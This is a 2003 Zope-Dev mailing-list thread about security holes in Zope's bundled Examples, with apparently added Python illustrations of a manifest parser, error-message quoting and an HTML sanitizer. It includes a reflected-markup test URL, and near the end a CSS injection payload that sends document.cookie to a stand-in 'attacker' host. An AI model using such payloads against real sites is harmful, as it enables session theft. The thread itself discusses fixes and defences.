weak examples, weak exploits
http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt

This hit the full-disclosure list the other day. Vulnerabilities 1 and 3 are moot and have been since the introduction of SiteErrorLog. Although if the responsible parties had bothered digging a little deeper they'd have found the BCI HTTP headers and likely thrown a fit. Anyway, if you can wade your way past all the spelling errors you'll see the 0day exploits are your typical abuse of badly coded web apps, and apart from 1 and 3 there are probably legitimate bugs there.

Your predictable response: They're just examples. Uninstall them. They shouldn't be left on a production system.

Sure, you know that, I know that, my cat knows that. Joe Six Pack told me he knew, but he didn't care. Which tends to be the consensus. But that's no excuse to be shipping bad examples. They should be fixed; bad examples are worse than no examples at all.

I'll submit a fixed Examples.zexp but I need to know how it's normally prepared, ownership, etc. Is there anything special I should do?

--
Jamie Heilman
http://audible.transient.net/~jamie/
"I was in love once -- a Sinclair ZX-81. People said, "No, Holly, she's not for you." She was cheap, she was stupid and she wouldn't load -- well, not for me, anyway." -Holly
On Mon, 2003-06-23 at 09:20, Jamie Heilman wrote:
I'll submit a fixed Examples.zexp but I need to know how it's normally prepared, ownership, etc. Is there anything special I should do?
No. Just go ahead and make the changes. It would be instructive for others reading the examples to add a comment or two explaining the rationale behind the extra checking code.

The file upload vulnerability was fixed in version 1.3 of Examples.zexp, though. The reason it's still turning up in 2.6.x versions is probably due to upgrades. Therefore I suppose additionally there should be a patch which examines the ZODB on startup and prints a warning if an old Examples folder is present.

seb
seb bacon wrote:
No. Just go ahead and make the changes. It would be instructive for others reading the examples to add a comment or two explaining the rationale behind the extra checking code.
'k I can do that
The file upload vulnerability was fixed in version 1.3 of Examples.zexp, though. The reason it's still turning up in 2.6.x versions is probably due to upgrades. Therefore I suppose additionally there should be a patch which examines the ZODB on startup and prints a warning if an old Examples folder is present.
You know, ironically, I don't think this "advisory" even covers that hole. There's obvious DoS potential in the guest book and such, but that's easily limited without degrading the value of the example. Anyway, I'll scrape over the examples and see what I can clean up.

--
Jamie Heilman
http://audible.transient.net/~jamie/
"Most people wouldn't know music if it came up and bit them on the ass." -Frank Zappa
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in every ZODB by default. Make people add it if they want it.

-Casey

On Monday 23 June 2003 05:12 am, Jamie Heilman wrote:
seb bacon wrote:
No. Just go ahead and make the changes. It would be instructive for others reading the examples to add a comment or two explaining the rationale behind the extra checking code.
'k I can do that
The file upload vulnerability was fixed in version 1.3 of Examples.zexp, though. The reason it's still turning up in 2.6.x versions is probably due to upgrades. Therefore I suppose additionally there should be a patch which examines the ZODB on startup and prints a warning if an old Examples folder is present.
You know, ironically, I don't think this "advisory" even covers that hole. There's obvious DoS potential in the guest book and such, but that's easily limited without degrading the value of the example. Anyway, I'll scrape over the examples and see what I can clean up.
--
Jamie Heilman
http://audible.transient.net/~jamie/
"Most people wouldn't know music if it came up and bit them on the ass." -Frank Zappa
_______________________________________________
Zope-Dev maillist - Zope-Dev@zope.org
http://mail.zope.org/mailman/listinfo/zope-dev
** No cross posts or HTML encoding! **
(Related lists - http://mail.zope.org/mailman/listinfo/zope-announce http://mail.zope.org/mailman/listinfo/zope )
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in every ZODB by default. Make people add it if they want it.
+1 a simple "How to add the examples to the ZODB" at the top of the help would be good. Mind you I really don't want the HelpSys in my ZODB either :)

--
Andy McKay
http://www.agmweb.ca
On Monday 23 June 2003 12:00 pm, Andy McKay wrote:
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in every ZODB by default. Make people add it if they want it.
+1 a simple "How to add the examples to the ZODB" at the top of the help would be good. Mind you I really don't want the HelpSys in my ZODB either :)
Actually the add form could be linked from the Quick Start page to make it really stupid simple.

-Casey
Andy McKay wrote:
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in every ZODB by default. Make people add it if they want it.
+1 a simple "How to add the examples to the ZODB" at the top of the help would be good. Mind you I really don't want the HelpSys in my ZODB either :)
Removing the help system could also appreciably boost startup time. I can't remember the last time I used the help system, yet it creates a ZCatalog for each Zope product. It would be beneficial to allow users to disable it completely.

Shane
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in every ZODB by default. Make people add it if they want it.
Many, many moons ago I created evan-examples-branch, which allows individual Products to offer sample code without (magically or otherwise) forcing them upon the user. I'd love to see it revived, perhaps as "Examples/Optional Extras" in order to cover the Hurt system as well.

The basic idea is to look for an XML manifest file 'examples/index.xml' in each Product. It probably wouldn't be very hard to use ZConfig instead of XML. Here is the PageTemplates index.xml:

<example name="Assorted Examples">
  <description>
    This is a set of examples of the use of page templates.
    It includes examples of batching, macros, and trees.
  </description>
  <payload>
    <import file="zpt_examples.zexp"/>
  </payload>
  <view url="zpt_examples"/>
</example>

<!--
This file can contain any number of examples. Each one consists of an <example> with a 'name' attribute, containing exactly one <description>. The name and description are displayed in the Examples page. <description> can have a 'format' attribute set to 'plain' (the default), 'stx' (structured text), or 'html'.

An <example> can contain <payload> elements. Each <payload> can contain any number of <import>, <execute>, and <call> elements. These are processed in order when an example is selected from the Examples page. <import> must have a 'file' attribute that names a file in the 'examples' directory to be imported. <execute> must have a 'file' attribute that names a file to be run with execfile. <call> must have a 'path' attribute that gives the path to a Zope object to be called.

An <example> can contain at most one <view> element. The 'url' attribute of a <view> is the URL to view after all <payload> elements have been processed. This URL can be relative to the current folder.
-->

Cheers,
Evan @ 4-am
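As an added example (not code from evan-examples-branch or from Zope), here is a parser that reads a manifest of the shape described in the comment above and enforces its rules before anything is imported or executed: one name, exactly one description with a known format, only import/execute/call steps with their required attribute, at most one view. Two things are my own assumptions: several examples in one file are wrapped in an enclosing root element (the thread's file has a single top-level example, which the parser also accepts as-is), and a 'file' attribute must be a bare file name so a manifest cannot point outside the Product's examples directory. The second sample entry is constructed for the test.

```python
"""Parse and validate an examples/index.xml manifest.

Added illustration only; not the evan-examples-branch implementation.
"""
import os
import xml.etree.ElementTree as ET

# Step element -> the attribute the spec in the manifest comment requires.
PAYLOAD_ACTIONS = {"import": "file", "execute": "file", "call": "path"}
DESCRIPTION_FORMATS = {"plain", "stx", "html"}

# Constructed sample: the PageTemplates entry from the thread plus a second,
# made-up entry.  The <examples> wrapper is an assumption so that several
# <example> elements can live in one well-formed XML file.
SAMPLE_INDEX_XML = """<examples>
<example name="Assorted Examples">
  <description>
    This is a set of examples of the use of page templates.
    It includes examples of batching, macros, and trees.
  </description>
  <payload>
    <import file="zpt_examples.zexp"/>
  </payload>
  <view url="zpt_examples"/>
</example>
<example name="Second Entry">
  <description format="stx">A constructed second entry.</description>
  <payload>
    <import file="second.zexp"/>
    <call path="/second/setup"/>
  </payload>
</example>
</examples>"""


class ManifestError(ValueError):
    """Raised for a manifest that violates the rules described above."""


def _safe_examples_file(name):
    # Assumed rule (not in the thread's spec): a file must be a plain name
    # inside the Product's examples directory, never a path such as
    # ../../something or an absolute path.
    if not name or name in (".", "..") or name != os.path.basename(name):
        raise ManifestError("bad example file name %r" % name)
    return name


def parse_example(el):
    """Validate one <example> element and return a plain dict."""
    if el.tag != "example":
        raise ManifestError("expected <example>, got <%s>" % el.tag)
    name = el.get("name")
    if not name:
        raise ManifestError("<example> needs a 'name' attribute")
    descs = el.findall("description")
    if len(descs) != 1:
        raise ManifestError("%s: exactly one <description> required" % name)
    fmt = descs[0].get("format", "plain")
    if fmt not in DESCRIPTION_FORMATS:
        raise ManifestError("%s: unknown description format %r" % (name, fmt))
    steps = []
    for payload in el.findall("payload"):
        for step in payload:  # processed in document order
            attr = PAYLOAD_ACTIONS.get(step.tag)
            if attr is None:
                raise ManifestError("%s: <%s> not allowed in <payload>" % (name, step.tag))
            value = step.get(attr)
            if not value:
                raise ManifestError("%s: <%s> needs a '%s' attribute" % (name, step.tag, attr))
            if attr == "file":
                value = _safe_examples_file(value)
            steps.append((step.tag, value))
    views = el.findall("view")
    if len(views) > 1:
        raise ManifestError("%s: at most one <view> allowed" % name)
    return {
        "name": name,
        "description": " ".join((descs[0].text or "").split()),
        "format": fmt,
        "steps": steps,
        "view": views[0].get("url") if views else None,
    }


def parse_manifest(xml_text):
    """Accept either a single top-level <example> or a wrapper holding several."""
    root = ET.fromstring(xml_text)
    elements = [root] if root.tag == "example" else list(root)
    return [parse_example(e) for e in elements]


if __name__ == "__main__":
    for ex in parse_manifest(SAMPLE_INDEX_XML):
        print(ex["name"], ex["steps"], ex["view"])
```

The parser only produces a list of steps; whatever installs an example still decides whether to honour an <execute> step, since that runs arbitrary code from the Product's directory.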
Evan Simpson wrote:
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in every ZODB by default. Make people add it if they want it.
Many, many moons ago I created evan-examples-branch, which allows individual Products to offer sample code without (magically or otherwise) forcing them upon the user. I'd love to see it revived, perhaps as "Examples/Optional Extras" in order to cover the Hurt system as well.
This seems like a fine idea, but what action would the user take to install examples and extras?

Shane
Evan Simpson wrote:
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in every ZODB by default. Make people add it if they want it.

This seems like a fine idea, but what action would the user take to install examples and extras?

I think the best way would be using a python script/Makefile that installs a .zexp file (or use http-upload with httplib). Configure should grow a --install-tutorial option.
Pieter
--
http://zwiki.org/PieterB
PieterB wrote:
Evan Simpson wrote:
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in every ZODB by default. Make people add it if they want it.
This seems like a fine idea, but what action would the user take to install examples and extras?
I think the best way would be using a python script/Makefile that installs a .zexp file (or use http-upload with httplib). Configure should grow a --install-tutorial option.
Mmmm... I need to clarify my question. Let's say you make and install Zope. You fire it up and don't know what to do next. You look for some button or control in the UI for displaying documentation and examples. What do you find? An entry in the add list? Will you still find the "help" link, but clicking it only tells you how to install the documentation? Zope needs to help the user find the docs.

Shane
On Tue, 2003-06-24 at 10:09, Shane Hathaway wrote:
PieterB wrote:
Evan Simpson wrote:
Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in every ZODB by default. Make people add it if they want it.
This seems like a fine idea, but what action would the user take to install examples and extras?
I think the best way would be using a python script/Makefile that installs a .zexp file (or use http-upload with httplib). Configure should grow a --install-tutorial option.
Mmmm... I need to clarify my question. Let's say you make and install Zope. You fire it up and don't know what to do next. You look for some button or control in the UI for displaying documentation and examples. What do you find? An entry in the add list? Will you still find the "help" link, but clicking it only tells you how to install the documentation? Zope needs to help the user find the docs.
Jamie Heilman came up with a reasonable way to do this. The Zope Quick Start page instructs the user to import the examples and gives him a link which does so by calling manage_import. I've merged this into the HEAD and the 2.6 branch.

- C
Chris McDonough wrote:
Jamie Heilman came up with a reasonable way to do this. The Zope Quick Start page instructs the user to import the examples and gives him a link which does so by calling manage_import.
Actually... /me points at Casey ...not my idea, I just implemented a good suggestion.
Shane Hathaway wrote:
This seems like a fine idea, but what action would the user take to install examples and extras?
In my initial implementation, there was a separate page that listed the names and descriptions of the various examples, with links to install them. If I recall correctly, this page was reached from a link on Folder views, much like the current "Help" link. Also linking from the Quick Start sounds like a fine idea.

Cheers,
Evan @ 4-am
On Mon, Jun 23, 2003 at 10:33:42AM -0400, Casey Duncan wrote:
I would be in favor of making the Examples "opt-in" like the Zope tutorial. It seems silly to have it in every ZODB by default. Make people add it if they want it.
Moreover, the examples installed everywhere attract spam to docs@zope.com (forwarded to zdp@zope.org). I have seen numerous 'increase website traffic' spams explicitly mentioning /Examples URLs around the net.

--
Martijn Pieters | Software Engineer
mailto:mj@zope.com | Zope Corporation
http://www.zope.com/ | Creators of Zope
http://www.zope.org/
---------------------------------------------
seb bacon wrote:
The file upload vulnerability was fixed in version 1.3 of Examples.zexp, though. The reason it's still turning up in 2.6.x versions is probably due to upgrades. Therefore I suppose additionally there should be a patch which examines the ZODB on startup and prints a warning if an old Examples folder is present.
I opted for a patch that simply removes all the magic auto-install crud and goes for the installer link on the quick-start page. As for previous zope installations, well, I don't feel like trying to figure out how to examine the zodb and warn people if they've got bad examples still installed; it strikes me as too much junk in the startup procedure which is already too slow as it is. I say chalk it up as a lesson learned and move on.

As for my reworked examples, I added missing quoting to the navigation examples, size limits and entry limits to the guest book, size limits and entry limits to the file library, and additional sanity checking and robustness to just about everything.

Examining the original advisory this is how I break it down:

1) moot with the addition of SiteErrorLog
2) Examples/db no longer exists in the Examples, I'm unaware if it ever did, at any rate, not a problem
3) moot with the addition of SiteErrorLog
3a) this is a problem, see below
3b) fixed in my reworking
3c) I was unable to reproduce this, maybe a bug with older Zopes?
extra notes) wtf? I have no idea what the advisory author was trying to say by including that diff, and I have a feeling he doesn't know either. I mean, it has the words 'examples' and 'security' in it, but that doesn't make it relevant.

There is, unfortunately, a snag. One of the exploits (3a) as it turns out is actually a problem deeper down. To isolate a test case make a script like:

## Script (Python) "aww_shit_now_what"
##bind container=container
##bind context=context
##bind namespace=
##bind script=script
##bind subpath=traverse_subpath
##parameters=i
##title=
##
return int(i)

Then call it http://host/aww_shit_now_what=<b>old+flava'

This can be disarmed by ensuring that in your standard_error_message you quote the results of error_msg, however this isn't the default, and it will result in a lot of broken and ugly looking (albeit safer) error pages.
I haven't fully figured out exactly what's going on with that whole thing yet. I have a feeling it's attributable to either raise_standardErrorMessage's "smart" tag searching, or some other auto-magical aspect of the error handling framework. (clues appreciated) In the mean time I suggest quoting error_msg.

--
Jamie Heilman
http://audible.transient.net/~jamie/
"...that's the metaphorical equivalent of flopping your wedding tackle into a lion's mouth and flicking his lovespuds with a wet towel, pure insanity..." -Rimmer
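The snag Jamie describes comes down to an error page that echoes error_msg without quoting it, and the suggested remedy is to quote it. The following is an added example, not the Examples.zexp code nor Zope's own error handling: it runs the same one-line script body, catches the ValueError that int() raises with the offending input embedded in its message, and renders a minimal stand-in for standard_error_message both unquoted (the default the message complains about) and quoted with html.escape. The function names and the page template are constructed for the example.

```python
"""Why an unquoted error_msg reflects request input into the error page,
and the quoting fix.  Added illustration; not Zope code."""
import html


def aww_shit_now_what(i):
    # Same body as the Python Script in the message above: int() raises
    # ValueError and repeats the bad input inside the exception message.
    return int(i)


def call_script(script, **params):
    """Run a script and return (result, error_type, error_msg), the three
    values an error handler gets to work with."""
    try:
        return script(**params), None, None
    except Exception as exc:
        return None, type(exc).__name__, str(exc)


def render_error_page(error_type, error_msg, quote=True):
    """Minimal stand-in for standard_error_message.

    quote=False mirrors the default behaviour discussed in the thread:
    error_msg is dropped into the page verbatim, so any markup in the
    request input that ended up in the exception text becomes markup
    in the response.  quote=True applies the suggested fix.
    """
    if quote:
        error_type = html.escape(error_type, quote=True)
        error_msg = html.escape(error_msg, quote=True)
    return (
        "<html><body><h2>Site Error</h2>"
        "<p><b>Error Type:</b> %s</p>"
        "<p><b>Error Value:</b> %s</p></body></html>" % (error_type, error_msg)
    )


def error_page_for(i, quote=True):
    """Call the script with parameter i; return the error page, or None
    when the call succeeded and no error page is needed."""
    _, error_type, error_msg = call_script(aww_shit_now_what, i=i)
    if error_type is None:
        return None
    return render_error_page(error_type, error_msg, quote)


if __name__ == "__main__":
    # Constructed input: the value from the thread's URL after decoding.
    bad = "<b>old flava'"
    print(error_page_for(bad, quote=False))
    print(error_page_for(bad, quote=True))
```

The quoted page is uglier for errors whose message legitimately contained markup, which is the trade-off the message above mentions, but the request input can no longer change the structure of the response.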
Jamie Heilman wrote:
Then call it http://host/aww_shit_now_what=<b>old+flava'
er, http://host/aww_shit_now_what?i=<b>old+flava' rather.

--
Jamie Heilman
http://audible.transient.net/~jamie/
"Paranoia is a disease unto itself, and may I add, the person standing next to you may not be who they appear to be, so take precaution." -Sathington Willoughby
On Mon, 23 Jun 2003 01:20:35 -0700 Jamie Heilman <jamie@audible.transient.net> wrote:
http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt [snip] apps, and apart from 1 and 3 there are probably legitimate bugs there.
related issues: CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a, as far as the site permits anonymous users or persons without good references to write. To cope with the matter, I stupidly put multiple string substitution.

import re

t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'<disabled \1>', t)
t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'<disabled \1>', t)
t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>', r'<disabled \1>', t)

It would be appreciated if someone advises me of a more general and smart way. I know that Zope's StructuredText itself does not handle such a case, and that kind of implementation may be left to each developer. If it had the ability to avoid them, it would be much better, I think.

Another example

The following sample may allow malicious.css import from outside of the site. Put #1 or #2 to a StructuredText page.

#1
<LINK rel="stylesheet" href="http://attacker/malicious.css">

#2
<STYLE type="text/css">
@import url('http://attacker/malicious.css');
</STYLE>

# example of malicious.css http://attacker/malicious.css
body { left: expression(eval( 'document.location="http://attacker/"+document.cookie;')) }

For example, make a 'Document' in a CMFDefault site, and put #1 to the reply form, DiscussionItem, against the original document, etc. It seems CMFDefault is vulnerable to this attack. Any general remedy for that kind of exploit?

--
Kazuya Fukamachi
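One general answer to the question above, as an added example and not Zope, CMF or any of the products' code: instead of blacklisting tag names with a regular expression run several times, parse the fragment with html.parser and re-serialize it from the parsed tokens, keeping only an allowlist of tags and attributes. Because the output is rebuilt rather than edited in place, text that only turns into a tag after one substitution never gets a second chance, and the LINK and STYLE cases from the message above are dropped along with every other tag that is not on the list. The allowed tags, the attribute rule and the URL scheme check are my choices for this example.

```python
"""Allowlist HTML sanitizer built on html.parser.  Added illustration."""
import html
from html.parser import HTMLParser

# Assumed policy for the example: a small set of structural tags, href only
# on <a>, and elements whose text content is discarded together with the tag.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "ul", "ol", "li", "br", "pre", "code"}
ALLOWED_ATTRS = {"a": {"href"}}
DROP_CONTENT = {"script", "style", "iframe", "object", "embed"}
VOID_TAGS = {"br"}


def _safe_url(value):
    """Allow http(s), site-relative and fragment URLs; reject other schemes."""
    v = value.strip().lower()
    return v.startswith(("http://", "https://", "/", "#")) or ":" not in v


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0     # > 0 while inside a DROP_CONTENT element
        self.open_tags = []     # allowed tags currently open, for balancing

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_CONTENT:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return              # unknown tag is dropped; its text is kept
        kept = []
        for name, value in attrs:
            if name in ALLOWED_ATTRS.get(tag, ()) and value is not None and _safe_url(value):
                kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_CONTENT:
                self.skip_depth -= 1
            return
        if tag in self.open_tags:
            # Close everything opened since that tag so output stays balanced.
            while self.open_tags:
                t = self.open_tags.pop()
                self.out.append("</%s>" % t)
                if t == tag:
                    break

    def handle_data(self, data):
        # Character references were decoded by the parser; re-escape on output.
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

    def result(self):
        self.close()
        while self.open_tags:
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize(fragment):
    s = Sanitizer()
    s.feed(fragment)
    return s.result()


if __name__ == "__main__":
    # Constructed inputs, including the two CSS import forms from the thread.
    for sample in (
        '<p>Hello <b>world</b></p>',
        '<LINK rel="stylesheet" href="http://attacker/malicious.css">text',
        "<style type=\"text/css\">@import url('http://attacker/malicious.css');</style>ok",
        '<ifr<iframe>ame>nested',
    ):
        print(repr(sanitize(sample)))
```

Comments, declarations and processing instructions are discarded by the parser's default handlers, and unbalanced input is closed explicitly so the cleaned fragment cannot leave a tag open into the surrounding page.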